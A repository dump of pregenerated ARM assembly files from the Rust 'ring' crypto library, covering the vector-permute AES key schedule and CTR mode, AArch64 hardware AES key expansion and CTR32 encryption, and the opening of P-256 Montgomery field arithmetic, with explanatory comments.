vand q1, q0, q9 @ vpand %xmm9, %xmm0, %xmm1 # 0 = k
vshr.u8 q0, q0, #4 @ vpsrlb $4, %xmm0, %xmm0 # 1 = i
veor q7, q7, q4 @ vpxor %xmm4, %xmm7, %xmm7
vtbl.8 d4, {q11}, d2 @ vpshufb %xmm1, %xmm11, %xmm2 # 2 = a/k
vtbl.8 d5, {q11}, d3
veor q1, q1, q0 @ vpxor %xmm0, %xmm1, %xmm1 # 0 = j
vtbl.8 d6, {q10}, d0 @ vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
vtbl.8 d7, {q10}, d1
veor q3, q3, q2 @ vpxor %xmm2, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
vtbl.8 d8, {q10}, d2 @ vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
vtbl.8 d9, {q10}, d3
veor q7, q7, q12 @ vpxor .Lk_s63(%rip), %xmm7, %xmm7
vtbl.8 d6, {q10}, d6 @ vpshufb %xmm3, %xmm10, %xmm3 # 2 = 1/iak
vtbl.8 d7, {q10}, d7
veor q4, q4, q2 @ vpxor %xmm2, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
vtbl.8 d4, {q10}, d8 @ vpshufb %xmm4, %xmm10, %xmm2 # 3 = 1/jak
vtbl.8 d5, {q10}, d9
veor q3, q3, q1 @ vpxor %xmm1, %xmm3, %xmm3 # 2 = io
veor q2, q2, q0 @ vpxor %xmm0, %xmm2, %xmm2 # 3 = jo
vtbl.8 d8, {q15}, d6 @ vpshufb %xmm3, %xmm13, %xmm4 # 4 = sbou
vtbl.8 d9, {q15}, d7
vtbl.8 d2, {q14}, d4 @ vpshufb %xmm2, %xmm12, %xmm1 # 0 = sb1t
vtbl.8 d3, {q14}, d5
veor q1, q1, q4 @ vpxor %xmm4, %xmm1, %xmm1 # 0 = sbox output
@ add in smeared stuff
veor q0, q1, q7 @ vpxor %xmm7, %xmm1, %xmm0
veor q7, q1, q7 @ vmovdqa %xmm0, %xmm7
bx lr
.size _vpaes_schedule_round,.-_vpaes_schedule_round
@@
@@ .aes_schedule_transform
@@
@@ Linear-transform q0 according to tables at [r11]
@@
@@ Requires that q9 = 0x0F0F... as in preheat
@@ Output in q0
@@ Clobbers q1, q2, q14, q15
@@
.type _vpaes_schedule_transform,%function
.align 4
_vpaes_schedule_transform:
vld1.64 {q14,q15}, [r11] @ vmovdqa (%r11), %xmm2 # lo
@ vmovdqa 16(%r11), %xmm1 # hi
vand q1, q0, q9 @ vpand %xmm9, %xmm0, %xmm1
vshr.u8 q0, q0, #4 @ vpsrlb $4, %xmm0, %xmm0
vtbl.8 d4, {q14}, d2 @ vpshufb %xmm1, %xmm2, %xmm2
vtbl.8 d5, {q14}, d3
vtbl.8 d0, {q15}, d0 @ vpshufb %xmm0, %xmm1, %xmm0
vtbl.8 d1, {q15}, d1
veor q0, q0, q2 @ vpxor %xmm2, %xmm0, %xmm0
bx lr
.size _vpaes_schedule_transform,.-_vpaes_schedule_transform
@@
@@ .aes_schedule_mangle
@@
@@ Mangles q0 from (basis-transformed) standard version
@@ to our version.
@@
@@ On encrypt,
@@ xor with 0x63
@@ multiply by circulant 0,1,1,1
@@ apply shiftrows transform
@@
@@ On decrypt,
@@ xor with 0x63
@@ multiply by "inverse mixcolumns" circulant E,B,D,9
@@ deskew
@@ apply shiftrows transform
@@
@@
@@ Writes out to [r2], and increments or decrements it
@@ Keeps track of round number mod 4 in r8
@@ Preserves q0
@@ Clobbers q1-q5
@@
.type _vpaes_schedule_mangle,%function
.align 4
_vpaes_schedule_mangle:
tst r3, r3
vmov q4, q0 @ vmovdqa %xmm0, %xmm4 # save xmm0 for later
adr r11, .Lk_mc_forward @ Must be aligned to 8 mod 16.
vld1.64 {q5}, [r11] @ vmovdqa .Lk_mc_forward(%rip),%xmm5
@ encrypting
@ Write to q2 so we do not overlap table and destination below.
veor q2, q0, q12 @ vpxor .Lk_s63(%rip), %xmm0, %xmm4
add r2, r2, #16 @ add $16, %rdx
vtbl.8 d8, {q2}, d10 @ vpshufb %xmm5, %xmm4, %xmm4
vtbl.8 d9, {q2}, d11
vtbl.8 d2, {q4}, d10 @ vpshufb %xmm5, %xmm4, %xmm1
vtbl.8 d3, {q4}, d11
vtbl.8 d6, {q1}, d10 @ vpshufb %xmm5, %xmm1, %xmm3
vtbl.8 d7, {q1}, d11
veor q4, q4, q1 @ vpxor %xmm1, %xmm4, %xmm4
vld1.64 {q1}, [r8] @ vmovdqa (%r8,%r10), %xmm1
veor q3, q3, q4 @ vpxor %xmm4, %xmm3, %xmm3
.Lschedule_mangle_both:
@ Write to q2 so table and destination do not overlap.
vtbl.8 d4, {q3}, d2 @ vpshufb %xmm1, %xmm3, %xmm3
vtbl.8 d5, {q3}, d3
add r8, r8, #64-16 @ add $-16, %r8
and r8, r8, #~(1<<6) @ and $0x30, %r8
vst1.64 {q2}, [r2] @ vmovdqu %xmm3, (%rdx)
bx lr
.size _vpaes_schedule_mangle,.-_vpaes_schedule_mangle
.globl vpaes_set_encrypt_key
.hidden vpaes_set_encrypt_key
.type vpaes_set_encrypt_key,%function
.align 4
vpaes_set_encrypt_key:
stmdb sp!, {r7,r8,r9,r10,r11, lr}
vstmdb sp!, {d8,d9,d10,d11,d12,d13,d14,d15}
lsr r9, r1, #5 @ shr $5,%eax
	add	r9, r9, #5		@ add	$5,%eax
str r9, [r2,#240] @ mov %eax,240(%rdx) # AES_KEY->rounds = nbits/32+5;
mov r3, #0 @ mov $0,%ecx
mov r8, #0x30 @ mov $0x30,%r8d
bl _vpaes_schedule_core
eor r0, r0, r0
vldmia sp!, {d8,d9,d10,d11,d12,d13,d14,d15}
ldmia sp!, {r7,r8,r9,r10,r11, pc} @ return
.size vpaes_set_encrypt_key,.-vpaes_set_encrypt_key
@ Additional constants for converting to bsaes.
.type _vpaes_convert_consts,%object
.align 4
_vpaes_convert_consts:
@ .Lk_opt_then_skew applies skew(opt(x)) XOR 0x63, where skew is the linear
@ transform in the AES S-box. 0x63 is incorporated into the low half of the
@ table. This was computed with the following script:
@
@ def u64s_to_u128(x, y):
@ return x | (y << 64)
@ def u128_to_u64s(w):
@ return w & ((1<<64)-1), w >> 64
@ def get_byte(w, i):
@ return (w >> (i*8)) & 0xff
@ def apply_table(table, b):
@ lo = b & 0xf
@ hi = b >> 4
@ return get_byte(table[0], lo) ^ get_byte(table[1], hi)
@ def opt(b):
@ table = [
@ u64s_to_u128(0xFF9F4929D6B66000, 0xF7974121DEBE6808),
@ u64s_to_u128(0x01EDBD5150BCEC00, 0xE10D5DB1B05C0CE0),
@ ]
@ return apply_table(table, b)
@ def rot_byte(b, n):
@ return 0xff & ((b << n) | (b >> (8-n)))
@ def skew(x):
@ return (x ^ rot_byte(x, 1) ^ rot_byte(x, 2) ^ rot_byte(x, 3) ^
@ rot_byte(x, 4))
@ table = [0, 0]
@ for i in range(16):
@ table[0] |= (skew(opt(i)) ^ 0x63) << (i*8)
@ table[1] |= skew(opt(i<<4)) << (i*8)
@ print(" .quad 0x%016x, 0x%016x" % u128_to_u64s(table[0]))
@ print(" .quad 0x%016x, 0x%016x" % u128_to_u64s(table[1]))
.Lk_opt_then_skew:
.quad 0x9cb8436798bc4763, 0x6440bb9f6044bf9b
.quad 0x1f30062936192f00, 0xb49bad829db284ab
@ void vpaes_encrypt_key_to_bsaes(AES_KEY *bsaes, const AES_KEY *vpaes);
.globl vpaes_encrypt_key_to_bsaes
.hidden vpaes_encrypt_key_to_bsaes
.type vpaes_encrypt_key_to_bsaes,%function
.align 4
vpaes_encrypt_key_to_bsaes:
stmdb sp!, {r11, lr}
@ See _vpaes_schedule_core for the key schedule logic. In particular,
@ _vpaes_schedule_transform(.Lk_ipt) (section 2.2 of the paper),
@ _vpaes_schedule_mangle (section 4.3), and .Lschedule_mangle_last
@ contain the transformations not in the bsaes representation. This
@ function inverts those transforms.
@
@ Note also that bsaes-armv7.pl expects aes-armv4.pl's key
@ representation, which does not match the other aes_nohw_*
@ implementations. The ARM aes_nohw_* stores each 32-bit word
@ byteswapped, as a convenience for (unsupported) big-endian ARM, at the
@ cost of extra REV and VREV32 operations in little-endian ARM.
vmov.i8 q9, #0x0f @ Required by _vpaes_schedule_transform
adr r2, .Lk_mc_forward @ Must be aligned to 8 mod 16.
add r3, r2, 0x90 @ .Lk_sr+0x10-.Lk_mc_forward = 0x90 (Apple's toolchain doesn't support the expression)
vld1.64 {q12}, [r2]
vmov.i8 q10, #0x5b @ .Lk_s63 from vpaes-x86_64
adr r11, .Lk_opt @ Must be aligned to 8 mod 16.
	vmov.i8	q11, #0x63		@ .Lk_s63 without .Lk_ipt applied
@ vpaes stores one fewer round count than bsaes, but the number of keys
@ is the same.
ldr r2, [r1,#240]
add r2, r2, #1
str r2, [r0,#240]
@ The first key is transformed with _vpaes_schedule_transform(.Lk_ipt).
@ Invert this with .Lk_opt.
vld1.64 {q0}, [r1]!
bl _vpaes_schedule_transform
vrev32.8 q0, q0
vst1.64 {q0}, [r0]!
@ The middle keys have _vpaes_schedule_transform(.Lk_ipt) applied,
@ followed by _vpaes_schedule_mangle. _vpaes_schedule_mangle XORs 0x63,
@ multiplies by the circulant 0,1,1,1, then applies ShiftRows.
.Loop_enc_key_to_bsaes:
vld1.64 {q0}, [r1]!
@ Invert the ShiftRows step (see .Lschedule_mangle_both). Note we cycle
@ r3 in the opposite direction and start at .Lk_sr+0x10 instead of 0x30.
@ We use r3 rather than r8 to avoid a callee-saved register.
vld1.64 {q1}, [r3]
vtbl.8 d4, {q0}, d2
vtbl.8 d5, {q0}, d3
add r3, r3, #16
and r3, r3, #~(1<<6)
vmov q0, q2
@ Handle the last key differently.
subs r2, r2, #1
beq .Loop_enc_key_to_bsaes_last
@ Multiply by the circulant. This is its own inverse.
vtbl.8 d2, {q0}, d24
vtbl.8 d3, {q0}, d25
vmov q0, q1
vtbl.8 d4, {q1}, d24
vtbl.8 d5, {q1}, d25
veor q0, q0, q2
vtbl.8 d2, {q2}, d24
vtbl.8 d3, {q2}, d25
veor q0, q0, q1
@ XOR and finish.
veor q0, q0, q10
bl _vpaes_schedule_transform
vrev32.8 q0, q0
vst1.64 {q0}, [r0]!
b .Loop_enc_key_to_bsaes
.Loop_enc_key_to_bsaes_last:
@ The final key does not have a basis transform (note
@ .Lschedule_mangle_last inverts the original transform). It only XORs
@ 0x63 and applies ShiftRows. The latter was already inverted in the
@ loop. Note that, because we act on the original representation, we use
@ q11, not q10.
veor q0, q0, q11
vrev32.8 q0, q0
vst1.64 {q0}, [r0]
@ Wipe registers which contained key material.
veor q0, q0, q0
veor q1, q1, q1
veor q2, q2, q2
ldmia sp!, {r11, pc} @ return
.size vpaes_encrypt_key_to_bsaes,.-vpaes_encrypt_key_to_bsaes
.globl vpaes_ctr32_encrypt_blocks
.hidden vpaes_ctr32_encrypt_blocks
.type vpaes_ctr32_encrypt_blocks,%function
.align 4
vpaes_ctr32_encrypt_blocks:
mov ip, sp
stmdb sp!, {r7,r8,r9,r10,r11, lr}
@ This function uses q4-q7 (d8-d15), which are callee-saved.
vstmdb sp!, {d8,d9,d10,d11,d12,d13,d14,d15}
cmp r2, #0
@ r8 is passed on the stack.
ldr r8, [ip]
beq .Lctr32_done
@ _vpaes_encrypt_core expects the key in r2, so swap r2 and r3.
mov r9, r3
mov r3, r2
mov r2, r9
@ Load the IV and counter portion.
ldr r7, [r8, #12]
vld1.8 {q7}, [r8]
bl _vpaes_preheat
rev r7, r7 @ The counter is big-endian.
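@ In other words (a hedged Python sketch, names illustrative): only the
@ last 32-bit word of the counter block is incremented, as a big-endian
@ value, wrapping modulo 2^32:
@   def next_block(block):            # block: 16-byte counter block
@       n = (int.from_bytes(block[12:], "big") + 1) & 0xffffffff
@       return block[:12] + n.to_bytes(4, "big")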
.Lctr32_loop:
vmov q0, q7
	vld1.8	{q6}, [r0]!	@ Load input ahead of time
bl _vpaes_encrypt_core
veor q0, q0, q6 @ XOR input and result
vst1.8 {q0}, [r1]!
subs r3, r3, #1
@ Update the counter.
add r7, r7, #1
rev r9, r7
vmov.32 d15[1], r9
bne .Lctr32_loop
.Lctr32_done:
vldmia sp!, {d8,d9,d10,d11,d12,d13,d14,d15}
ldmia sp!, {r7,r8,r9,r10,r11, pc} @ return
.size vpaes_ctr32_encrypt_blocks,.-vpaes_ctr32_encrypt_blocks
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_ARM) && defined(__ELF__)
|
mi2bjss/Pressel-site | 7,650 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/aesv8-armx-ios64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__APPLE__)
#if __ARM_MAX_ARCH__>=7
.text
.section __TEXT,__const
.align 5
Lrcon:
.long 0x01,0x01,0x01,0x01
.long 0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d // rotate-n-splat
.long 0x1b,0x1b,0x1b,0x1b
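// The tbl/aese sequences below implement the classic key-schedule core
// against these constants. A hedged Python sketch of one AES-128
// expansion step (SBOX is assumed to be the standard AES S-box as a
// 256-entry list; words are 4-byte lists in key order):
//   def schedule_core(word, rcon):
//       word = word[1:] + word[:1]              # RotWord
//       word = [SBOX[b] for b in word]          # SubWord
//       word[0] ^= rcon                         # Rcon into first byte
//       return word
//   def expand_round(w, rcon):                  # w: four 4-byte words
//       t = schedule_core(list(w[3]), rcon)
//       out = [[a ^ b for a, b in zip(w[0], t)]]
//       for i in range(1, 4):
//           out.append([a ^ b for a, b in zip(w[i], out[-1])])
//       return out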
.text
.globl _aes_hw_set_encrypt_key
.private_extern _aes_hw_set_encrypt_key
.align 5
_aes_hw_set_encrypt_key:
Lenc_key:
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
mov x3,#-2
cmp w1,#128
b.lt Lenc_key_abort
cmp w1,#256
b.gt Lenc_key_abort
tst w1,#0x3f
b.ne Lenc_key_abort
adrp x3,Lrcon@PAGE
add x3,x3,Lrcon@PAGEOFF
cmp w1,#192
eor v0.16b,v0.16b,v0.16b
ld1 {v3.16b},[x0],#16
mov w1,#8 // reuse w1
ld1 {v1.4s,v2.4s},[x3],#32
b.lt Loop128
// 192-bit key support was removed.
b L256
.align 4
Loop128:
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
subs w1,w1,#1
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
b.ne Loop128
ld1 {v1.4s},[x3]
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
eor v3.16b,v3.16b,v6.16b
st1 {v3.4s},[x2]
add x2,x2,#0x50
mov w12,#10
b Ldone
// 192-bit key support was removed.
.align 4
L256:
ld1 {v4.16b},[x0]
mov w1,#7
mov w12,#14
st1 {v3.4s},[x2],#16
Loop256:
tbl v6.16b,{v4.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v4.4s},[x2],#16
aese v6.16b,v0.16b
subs w1,w1,#1
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
st1 {v3.4s},[x2],#16
b.eq Ldone
dup v6.4s,v3.s[3] // just splat
ext v5.16b,v0.16b,v4.16b,#12
aese v6.16b,v0.16b
eor v4.16b,v4.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v4.16b,v4.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v4.16b,v4.16b,v5.16b
eor v4.16b,v4.16b,v6.16b
b Loop256
Ldone:
str w12,[x2]
mov x3,#0
Lenc_key_abort:
mov x0,x3 // return value
ldr x29,[sp],#16
ret
.globl _aes_hw_ctr32_encrypt_blocks
.private_extern _aes_hw_ctr32_encrypt_blocks
.align 5
_aes_hw_ctr32_encrypt_blocks:
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
ldr w5,[x3,#240]
ldr w8, [x4, #12]
ld1 {v0.4s},[x4]
ld1 {v16.4s,v17.4s},[x3] // load key schedule...
sub w5,w5,#4
mov x12,#16
cmp x2,#2
add x7,x3,x5,lsl#4 // pointer to last 5 round keys
sub w5,w5,#2
ld1 {v20.4s,v21.4s},[x7],#32
ld1 {v22.4s,v23.4s},[x7],#32
ld1 {v7.4s},[x7]
add x7,x3,#32
mov w6,w5
csel x12,xzr,x12,lo
// ARM Cortex-A57 and Cortex-A72 cores running in 32-bit mode are
// affected by silicon errata #1742098 [0] and #1655431 [1],
// respectively, where the second instruction of an aese/aesmc
// instruction pair may execute twice if an interrupt is taken right
// after the first instruction consumes an input register of which a
// single 32-bit lane has been updated the last time it was modified.
//
// This function uses a counter in one 32-bit lane. The vmov lines
// could write to v1.16b and v18.16b directly, but that would trip these bugs.
// We write to v6.16b and copy to the final register as a workaround.
//
// [0] ARM-EPM-049219 v23 Cortex-A57 MPCore Software Developers Errata Notice
// [1] ARM-EPM-012079 v11.0 Cortex-A72 MPCore Software Developers Errata Notice
#ifndef __AARCH64EB__
rev w8, w8
#endif
add w10, w8, #1
orr v6.16b,v0.16b,v0.16b
rev w10, w10
mov v6.s[3],w10
add w8, w8, #2
orr v1.16b,v6.16b,v6.16b
b.ls Lctr32_tail
rev w12, w8
mov v6.s[3],w12
sub x2,x2,#3 // bias
orr v18.16b,v6.16b,v6.16b
b Loop3x_ctr32
.align 4
Loop3x_ctr32:
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
aese v18.16b,v16.16b
aesmc v18.16b,v18.16b
ld1 {v16.4s},[x7],#16
subs w6,w6,#2
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
aese v18.16b,v17.16b
aesmc v18.16b,v18.16b
ld1 {v17.4s},[x7],#16
b.gt Loop3x_ctr32
aese v0.16b,v16.16b
aesmc v4.16b,v0.16b
aese v1.16b,v16.16b
aesmc v5.16b,v1.16b
ld1 {v2.16b},[x0],#16
add w9,w8,#1
aese v18.16b,v16.16b
aesmc v18.16b,v18.16b
ld1 {v3.16b},[x0],#16
rev w9,w9
aese v4.16b,v17.16b
aesmc v4.16b,v4.16b
aese v5.16b,v17.16b
aesmc v5.16b,v5.16b
ld1 {v19.16b},[x0],#16
mov x7,x3
aese v18.16b,v17.16b
aesmc v17.16b,v18.16b
aese v4.16b,v20.16b
aesmc v4.16b,v4.16b
aese v5.16b,v20.16b
aesmc v5.16b,v5.16b
eor v2.16b,v2.16b,v7.16b
add w10,w8,#2
aese v17.16b,v20.16b
aesmc v17.16b,v17.16b
eor v3.16b,v3.16b,v7.16b
add w8,w8,#3
aese v4.16b,v21.16b
aesmc v4.16b,v4.16b
aese v5.16b,v21.16b
aesmc v5.16b,v5.16b
	// Note the logic to update v0.16b, v1.16b, and v18.16b is written to work
// around a bug in ARM Cortex-A57 and Cortex-A72 cores running in
// 32-bit mode. See the comment above.
eor v19.16b,v19.16b,v7.16b
mov v6.s[3], w9
aese v17.16b,v21.16b
aesmc v17.16b,v17.16b
orr v0.16b,v6.16b,v6.16b
rev w10,w10
aese v4.16b,v22.16b
aesmc v4.16b,v4.16b
mov v6.s[3], w10
rev w12,w8
aese v5.16b,v22.16b
aesmc v5.16b,v5.16b
orr v1.16b,v6.16b,v6.16b
mov v6.s[3], w12
aese v17.16b,v22.16b
aesmc v17.16b,v17.16b
orr v18.16b,v6.16b,v6.16b
subs x2,x2,#3
aese v4.16b,v23.16b
aese v5.16b,v23.16b
aese v17.16b,v23.16b
eor v2.16b,v2.16b,v4.16b
ld1 {v16.4s},[x7],#16 // re-pre-load rndkey[0]
st1 {v2.16b},[x1],#16
eor v3.16b,v3.16b,v5.16b
mov w6,w5
st1 {v3.16b},[x1],#16
eor v19.16b,v19.16b,v17.16b
ld1 {v17.4s},[x7],#16 // re-pre-load rndkey[1]
st1 {v19.16b},[x1],#16
b.hs Loop3x_ctr32
adds x2,x2,#3
b.eq Lctr32_done
cmp x2,#1
mov x12,#16
csel x12,xzr,x12,eq
Lctr32_tail:
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
ld1 {v16.4s},[x7],#16
subs w6,w6,#2
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
ld1 {v17.4s},[x7],#16
b.gt Lctr32_tail
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
ld1 {v2.16b},[x0],x12
aese v0.16b,v20.16b
aesmc v0.16b,v0.16b
aese v1.16b,v20.16b
aesmc v1.16b,v1.16b
ld1 {v3.16b},[x0]
aese v0.16b,v21.16b
aesmc v0.16b,v0.16b
aese v1.16b,v21.16b
aesmc v1.16b,v1.16b
eor v2.16b,v2.16b,v7.16b
aese v0.16b,v22.16b
aesmc v0.16b,v0.16b
aese v1.16b,v22.16b
aesmc v1.16b,v1.16b
eor v3.16b,v3.16b,v7.16b
aese v0.16b,v23.16b
aese v1.16b,v23.16b
cmp x2,#1
eor v2.16b,v2.16b,v0.16b
eor v3.16b,v3.16b,v1.16b
st1 {v2.16b},[x1],#16
b.eq Lctr32_done
st1 {v3.16b},[x1]
Lctr32_done:
ldr x29,[sp],#16
ret
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__APPLE__)
|
mi2bjss/Pressel-site | 36,746 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/p256-armv8-asm-linux64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__ELF__)
.section .rodata
.align 5
.Lpoly:
.quad 0xffffffffffffffff,0x00000000ffffffff,0x0000000000000000,0xffffffff00000001
.LRR: // 2^512 mod P precomputed for NIST P256 polynomial
.quad 0x0000000000000003,0xfffffffbffffffff,0xfffffffffffffffe,0x00000004fffffffd
.Lone_mont:
.quad 0x0000000000000001,0xffffffff00000000,0xffffffffffffffff,0x00000000fffffffe
.Lone:
.quad 1,0,0,0
.Lord:
.quad 0xf3b9cac2fc632551,0xbce6faada7179e84,0xffffffffffffffff,0xffffffff00000000
.LordK:
.quad 0xccd1c8aaee00bc4f
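// Assuming .LordK is the Montgomery constant -n^{-1} mod 2^64 for the
// group order n (a hedged check, Python 3.8+, not part of the
// generated output):
//   n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
//   assert (-pow(n, -1, 1 << 64)) % (1 << 64) == 0xccd1c8aaee00bc4f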
.byte 69,67,80,95,78,73,83,84,90,50,53,54,32,102,111,114,32,65,82,77,118,56,44,32,67,82,89,80,84,79,71,65,77,83,32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115,115,108,46,111,114,103,62,0
.align 2
.text
// void ecp_nistz256_mul_mont(BN_ULONG x0[4],const BN_ULONG x1[4],
// const BN_ULONG x2[4]);
.globl ecp_nistz256_mul_mont
.hidden ecp_nistz256_mul_mont
.type ecp_nistz256_mul_mont,%function
.align 4
ecp_nistz256_mul_mont:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-32]!
add x29,sp,#0
stp x19,x20,[sp,#16]
ldr x3,[x2] // bp[0]
ldp x4,x5,[x1]
ldp x6,x7,[x1,#16]
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
bl __ecp_nistz256_mul_mont
ldp x19,x20,[sp,#16]
ldp x29,x30,[sp],#32
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_mul_mont,.-ecp_nistz256_mul_mont
// void ecp_nistz256_sqr_mont(BN_ULONG x0[4],const BN_ULONG x1[4]);
.globl ecp_nistz256_sqr_mont
.hidden ecp_nistz256_sqr_mont
.type ecp_nistz256_sqr_mont,%function
.align 4
ecp_nistz256_sqr_mont:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-32]!
add x29,sp,#0
stp x19,x20,[sp,#16]
ldp x4,x5,[x1]
ldp x6,x7,[x1,#16]
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
bl __ecp_nistz256_sqr_mont
ldp x19,x20,[sp,#16]
ldp x29,x30,[sp],#32
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_sqr_mont,.-ecp_nistz256_sqr_mont
// void ecp_nistz256_neg(BN_ULONG x0[4],const BN_ULONG x1[4]);
.globl ecp_nistz256_neg
.hidden ecp_nistz256_neg
.type ecp_nistz256_neg,%function
.align 4
ecp_nistz256_neg:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-16]!
add x29,sp,#0
mov x2,x1
mov x14,xzr // a = 0
mov x15,xzr
mov x16,xzr
mov x17,xzr
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
bl __ecp_nistz256_sub_from
ldp x29,x30,[sp],#16
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_neg,.-ecp_nistz256_neg
// note that __ecp_nistz256_mul_mont expects a[0-3] input pre-loaded
// to x4-x7 and b[0] - to x3
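// The reduction below relies on this identity for the P-256 prime
// (a hedged Python sketch): with t = acc[0],
//   p = (1 << 256) - (1 << 224) + (1 << 192) + (1 << 96) - 1
//   t = 0x0123456789abcdef                     # any 64-bit acc[0]
//   assert t + t * p == (t << 96) + ((t * 0xffffffff00000001) << 192)
// so adding t*p clears the low limb: the code shifts the accumulator
// down one limb while adding t<<96 (the lsl/lsr pair) and the 128-bit
// product t*0xffffffff00000001 (the subs/sbc pair).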
.type __ecp_nistz256_mul_mont,%function
.align 4
__ecp_nistz256_mul_mont:
mul x14,x4,x3 // a[0]*b[0]
umulh x8,x4,x3
mul x15,x5,x3 // a[1]*b[0]
umulh x9,x5,x3
mul x16,x6,x3 // a[2]*b[0]
umulh x10,x6,x3
mul x17,x7,x3 // a[3]*b[0]
umulh x11,x7,x3
ldr x3,[x2,#8] // b[1]
adds x15,x15,x8 // accumulate high parts of multiplication
lsl x8,x14,#32
adcs x16,x16,x9
lsr x9,x14,#32
adcs x17,x17,x10
adc x19,xzr,x11
mov x20,xzr
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
mul x8,x4,x3 // lo(a[0]*b[i])
adcs x15,x16,x9
mul x9,x5,x3 // lo(a[1]*b[i])
adcs x16,x17,x10 // +=acc[0]*0xffff0001
mul x10,x6,x3 // lo(a[2]*b[i])
adcs x17,x19,x11
mul x11,x7,x3 // lo(a[3]*b[i])
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts of multiplication
umulh x8,x4,x3 // hi(a[0]*b[i])
adcs x15,x15,x9
umulh x9,x5,x3 // hi(a[1]*b[i])
adcs x16,x16,x10
umulh x10,x6,x3 // hi(a[2]*b[i])
adcs x17,x17,x11
umulh x11,x7,x3 // hi(a[3]*b[i])
adc x19,x19,xzr
ldr x3,[x2,#8*(1+1)] // b[1+1]
adds x15,x15,x8 // accumulate high parts of multiplication
lsl x8,x14,#32
adcs x16,x16,x9
lsr x9,x14,#32
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
mul x8,x4,x3 // lo(a[0]*b[i])
adcs x15,x16,x9
mul x9,x5,x3 // lo(a[1]*b[i])
adcs x16,x17,x10 // +=acc[0]*0xffff0001
mul x10,x6,x3 // lo(a[2]*b[i])
adcs x17,x19,x11
mul x11,x7,x3 // lo(a[3]*b[i])
adc x19,x20,xzr
